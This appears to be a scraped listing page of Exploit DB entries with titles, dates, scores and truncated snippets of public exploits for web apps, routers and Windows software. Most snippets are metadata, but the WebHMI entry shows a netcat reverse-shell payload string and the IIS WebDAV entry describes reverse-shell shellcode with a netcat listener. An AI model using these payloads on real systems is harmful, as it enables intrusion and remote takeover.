Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2012/01/31 12:0 a.m.242 views

Apache - httpOnly Cookie Disclosure

// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 // Most browsers limit cookies to 4k characters, so we need multiple function setCookies good // Construct string for cookie value var str = ""; for var i=0; i content var content =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/07/09 12:0 a.m.242 views

Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure

milw0rm.com 2006-07-09...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/22 12:0 a.m.241 views

Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution

Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in PDF.js Date: 2025-04-16 Exploit Author: Milad Karimi Ex3ptionaL Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL MiRROR-H: https://mirror-h.org/search/hacker/49626/ Vendor Homepage:...

8.8CVSS7.4AI score0.72648EPSS
Exploits15
Exploit DB
Exploit DB
added 2023/03/28 12:0 a.m.241 views

Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting XSS Date: 2022-08-10 Exploit Author: Sinem Şahin Vendor Homepage: https://intelliants.com/ Version: 4.2.1 Tested on: Windows & XAMPP == Tutorial http://HOST/panel/fields/add 2- Write XSS Payload into the tooltip value of the field add...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.241 views

WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)

Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Vulnerable Code: $w = isset$GET'search...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/08 12:0 a.m.241 views

Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass

Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass Date: 08.10.2021 Exploit Author: Merve Oral Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/15 12:0 a.m.241 views

Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netsia SEBA+ %q This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. HTTP requests made to the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/07/26 12:0 a.m.241 views

LibreHealth 2.0.0 - Authenticated Remote Code Execution

Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution Exploit Author: Bobby Cooke Date: 2020-07-17 Vendor Homepage: https://librehealth.io/ Software Link: https://github.com/LibreHealthIO/lh-ehr Version: 2.0.0 Tested On: Windows 10 Pro 1909 x6486 + XAMPP 7.4.4 Exploit Tested Usin...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/21 12:0 a.m.241 views

PMB 5.6 - 'logid' SQL Injection

Exploit Title: PMB 5.6 - 'logid' SQL Injection Google Dork: inurl:opaccss Date: 2020-04-20 Exploit Author: 41-trk Tarik Bakir Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files Affected versions : = 5.6 -==== Software Description ====- PMB is a...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.241 views

ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)

Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-04-05 Vendor Homepage: https://www.emtec.com Software Link : http://www.emtec.com/downloads/zoc/zoc7255x64.exe Tested Version: 7.25.5 Vulnerability Type: Local Tested on OS:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.241 views

Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)

Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service PoC Discovery by: 0xMoHassan Date: 2020-04-04 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.2.0.0 Vulnerability Type: Denial of Service DoS Local Tested o...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/10/07 12:0 a.m.241 views

IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload

Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload Date: 2018-12-11 Exploit Authors: Jakub Palaczynski Vendor Homepage: https://www.ibm.com/ Version: IBM Bigfix Platform Software Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable. U...

9.9CVSS9.6AI score0.14106EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/10/01 12:0 a.m.241 views

WebKit - UXSS Using JavaScript: URI and Synchronous Page Loads

VULNERABILITY DETAILS void DocumentWriter::replaceDocumentconst String& source, Document ownerDocument ... beginmframe-document-url, true, ownerDocument; // 1 // begin might fire an unload event, which will result in a situation where no new document has been attached, // and the old document has...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/30 12:0 a.m.241 views

TheSystem 1.0 - Command Injection

Exploit Title: thesystem Command Injection Author: Sadik Cetin Discovery Date: 2019-09-28 Vendor Homepage: https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem Software Link: https://github.com/kostasmitroglou/thesystem |...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/30 12:0 a.m.241 views

Asus Precision TouchPad 11.0.0.25 - Denial of Service

!/usr/bin/python Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc Date: 29-08-2019 Exploit Author: Athanasios Tserpelis of Telspace Systems Vendor Homepage: https://www.asus.com Version: 11.0.0.25 Software Link : https://www.asus.com Contact: [email protected] Twitter:...

9.8CVSS9.8AI score0.11536EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/03/04 12:0 a.m.241 views

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Booked Scheduler v2.7.5 - Remote Command Execution', 'Description' = %q This module exploits a file upload vulnerability Booked 2.7.5. In the "Loo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/10/16 12:0 a.m.241 views

Git Submodule - Arbitrary Code Execution

CVE-2018-17456 I've gotten a couple of questions about exploitation for the recent RCE in Git. So here we go with some technical details. TL;DR Here is a PoC repository. EDB Note: Mirror https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45631.zip Exploitation The...

9.8CVSS9.2AI score0.97356EPSS
Exploits12
Exploit DB
Exploit DB
added 2013/07/02 12:0 a.m.241 views

Intelligent Platform Management Interface - Information Disclosure

source: https://www.securityfocus.com/bid/61076/info Intelligent Platform Management Interface is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid password guessing attacks. Intelligent Platform Management Interface 2....

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/09 12:0 a.m.240 views

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting XSS Date: 04/28/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://anchorcms.com/ Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip Version: latest Tested on: MacOS Log in to Anchor CMS...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/07/16 12:0 a.m.240 views

Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege Escalation

Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path Discovery by: bios Discovery Date: 2024-15-07 Vendor Homepage: https://developer.apple.com/bonjour/ Tested Version: 3,0,0,10 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Windows 10 Home Step to discove...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.240 views

iMLog < 1.307 - Persistent Cross Site Scripting (XSS)

Exploit Title: iMLog "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to 5. Click on "Save" 6. Refresh the page, XSS will be triggered...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/19 12:0 a.m.240 views

CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting XSS Application: CmsMadeSimple Version: v2.2.17 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 12-07-2023 Author: Mirabbas...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/03 12:0 a.m.240 views

TP-Link TL-WR940N V4 - Buffer OverFlow

Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow Date: 2023-06-30 country: Iran Exploit Author: Amirhossein Bahramizadeh Category : hardware Dork : /userRpm/WanDynamicIpV6CfgRpm Tested on: Windows/Linux CVE : CVE-2023-36355 import requests Replace the IP address with the router's IP routerip...

9.9CVSS9.7AI score0.31733EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/05 12:0 a.m.240 views

Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)

!/usr/bin/env python3 Exploit Title: Kardex Mlog MCC 5.7.12 - RCE Remote Code Execution Date: 12/13/2022 Exploit Author: Patrick Hener Vendor Homepage: https://www.kardex.com/en/mlog-control-center Version: 5.7.12+0-a203c2a213-master Tested on: Windows Server 2016 CVE : CVE-2023-22855 Writeup:...

9.8CVSS9.8AI score0.14832EPSS
Exploits8
Exploit DB
Exploit DB
added 2022/02/08 12:0 a.m.240 views

WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)

Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting XSS Date: 2022-02-04 Author: Milad karimi Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/ Version: 1.2 Tested on: Windows 11 CVE: N/A 1. Description: This...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/08/17 12:0 a.m.240 views

QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure

Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure Date: 2020-08-12 Exploit Author: LiquidWorm Vendor Homepage: http://www.howfor.com Tested on: Microsoft Windows Server 2012 R2 Datacenter CVE : N/A QiHang Media Web QH.aspx Digital Signage 3.0.9...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/04 12:0 a.m.240 views

Clinic Management System 1.0 - Unauthenticated Remote Code Execution

Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2020-06-02 Exploit Author: BKpatron Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/16 12:0 a.m.240 views

DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' require 'openssl' require 'set' class MetasploitModule activetimeout payload handler is normally set up and started here but has be...

7.7AI score
Exploits0
Exploit DB
Exploit DB
added 2011/12/31 12:0 a.m.240 views

lighttpd - Denial of Service (PoC)

29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that modauth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/httpauth.c:67" --- CUT --- static const short...

5CVSS9.6AI score0.23076EPSS
Exploits8
Exploit DB
Exploit DB
added 2003/03/23 12:0 a.m.240 views

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

// / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the shellcode is a reverse remote shell / / y...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/11 12:0 a.m.239 views

ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)

Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution Authenticated Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: FLXeon Series FBXi Series, FBTi Series, FBVi Series CBX Series FLX Series CBT Series CBV Series Firmware: =9.3.4 Summary: BACnet® Smart Building...

10CVSS9.6AI score0.04328EPSS
Exploits18
Exploit DB
Exploit DB
added 2025/04/07 12:0 a.m.239 views

XWiki Platform 15.10.10 - Remote Code Execution

Exploit Title: XWiki Platform - Remote Code Execution Exploit Author: Al Baradi Joy Exploit Date: April 6, 2025 CVE ID: CVE-2025-24893 Vendor Homepage: https://www.xwiki.org/ Software Link: https://github.com/xwiki/xwiki-platform Version: Affected versions up to and including XWiki 15.10.10 Teste...

9.8CVSS7AI score0.99898EPSS
Exploits51
Exploit DB
Exploit DB
added 2023/06/21 12:0 a.m.239 views

HiSecOS 04.0.01 - Privilege Escalation

Exploit Title: HiSecOS 04.0.01 - Privilege Escalation Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation Date: 21.06.2023 Exploit Author: dreizehnutters Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/05/23 12:0 a.m.239 views

Affiliate Me Version 5.0.1 - SQL Injection

Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection Exploit Date: May 16, 2023. CVSS 3.1: 6.4 Medium CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Tactic: Initial Access TA0001 Technique: Exploit Public-Facing Application T1190 Application Name: Affiliate Me Application Version:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/08 12:0 a.m.239 views

ENTAB ERP 1.0 - Username PII leak

Exploit Title: ENTAB ERP 1.0 - Username PII leak Date: 17.05.2022 Exploit Author: Deb Prasad Banerjee Vendor Homepage: https://www.entab.in Version: Entab ERP 1.0 Tested on: Windows IIS CVE: CVE-2022-30076 Vulnerability Name: Broken Access control via Rate Limits Description: In the entab softwar...

5.3CVSS5.4AI score0.03543EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.239 views

Bookeen Notea - Directory Traversal

Exploit Title: Bookeen Notea - Directory Traversal Date: December 2021 Exploit Author: Clement MAILLIOUX Vendor Homepage: https://bookeen.com/ Software Link: N/A Version: BKR1.0.520210608 Tested on: Bookeen Notea Android 8.1 CVE : CVE 2021-45783 The affected version of the Bookeen Notea System...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/02/02 12:0 a.m.239 views

Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)

Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption Denial of Service Exploit Author: liquidworm !/usr/bin/env python Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption Denial of Service Vendor: Fetch Softworks Product web page: https://www.fetchsoftworks.com...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/13 12:0 a.m.239 views

WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...

10CVSS9.8AI score0.35804EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/09/23 12:0 a.m.239 views

Budget and Expense Tracker System 1.0 - Arbitrary File Upload

Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload Exploit Author: t//\1 Date: 23/09/2021 Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html Tested on: Linux Version: 2.0 Exploit Description: The...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/22 12:0 a.m.239 views

OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)

Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection XXE Date: 2021-09-20 Exploit Author: Jake Ruston Vendor Homepage: https://opencats.org Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip Version: w:document...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/07/06 12:0 a.m.239 views

Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation

Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation Date: 2021-07-05 Exploit Author: Andrea D'Ubaldo Vendor Homepage: https://visual-tools.com/ Version: Visual Tools VX16 v4.2.28.0 Tested on: VX16 Embedded Linux 2.6.35.4. An attacker can perform a system-level root local...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/06/10 12:0 a.m.239 views

n+otes 1.6.2 - Denial of Service (PoC)

Exploit Title: n+otes 1.6.2 - Denial of Service PoC Date: 06-09-2021 Author: Geovanni Ruiz Download Link: https://apps.apple.com/us/app/n-otes/id596895960 Version: 1.6.2 Category: DoS iOS Vulnerability Color Notes is vulnerable to a DoS condition when a long list of characters is being used when...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/19 12:0 a.m.239 views

Boonex Dolphin 7.4.2 - 'width' Stored XSS

Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS Date: 18-03-2021 Exploit Author: Piyush Patil Vendor Homepage: https://www.boonex.com/ Software Link: https://www.boonex.com/downloads Version: 7.4.2 Tested on: Windows 10 Reference -...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/11 12:0 a.m.239 views

Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)

Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection Authenticated 2 Date: 26/1/2021 Exploit Author: Metin Yunus Kandemir Discovered by: cmOs - SunCSR Vendor Homepage: https://openlitespeed.org/ Software Link: https://openlitespeed.org/kb/install-from-binary/ Version: 1.7.8 import...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/14 12:0 a.m.239 views

Online Shopping Cart System 1.0 - 'id' SQL Injection

Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection Date: 14.1.2021 Exploit Author: Aydın Baran Ertemir Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/01 12:0 a.m.239 views

SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)

Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery Add Admin Date: 2020-09-30 Exploit Author: LiquidWorm Vendor Homepage: https://www.spinetix.com Version: = 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit Vendor: SpinetiX AG Product web page:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.239 views

WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting

Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Date: 2020-01-21 Exploit Author: Gal Weizman Vendor Homepage: https://www.whatsapp.com Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe Software Link:...

8.2CVSS8.3AI score0.67859EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/02 12:0 a.m.239 views

TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)

Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass Upload Firmware Date: 2019-11-20 Exploit Author: Elber Tavares Vendor Homepage: https://www.tp-link.com/ Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/Firmware Version: TL-WR849N 0.9.1 4.16 Tested on: linux, window...

6.1CVSS6.6AI score0.03788EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/01/01 12:0 a.m.239 views

Microsoft Windows .Group File - Code Execution

Exploit Title: Microsoft Windows .Group File - Code Execution Date: 2020-01-01 Exploit Author: hyp3rlinx Vendor Homepage: www.microsoft.com Version: 1.9.6 Tested on: Windows CVE : N/A + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/12/06 12:0 a.m.239 views

Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite

Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit Author : Peter Lapp Exploit Date: 2019-12-05 Vendor Homepage : https://www.trendmicro.com/enus/business.html Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716 Tested on...

7.1CVSS7.2AI score0.01311EPSS
Exploits4
Total number of security vulnerabilities5000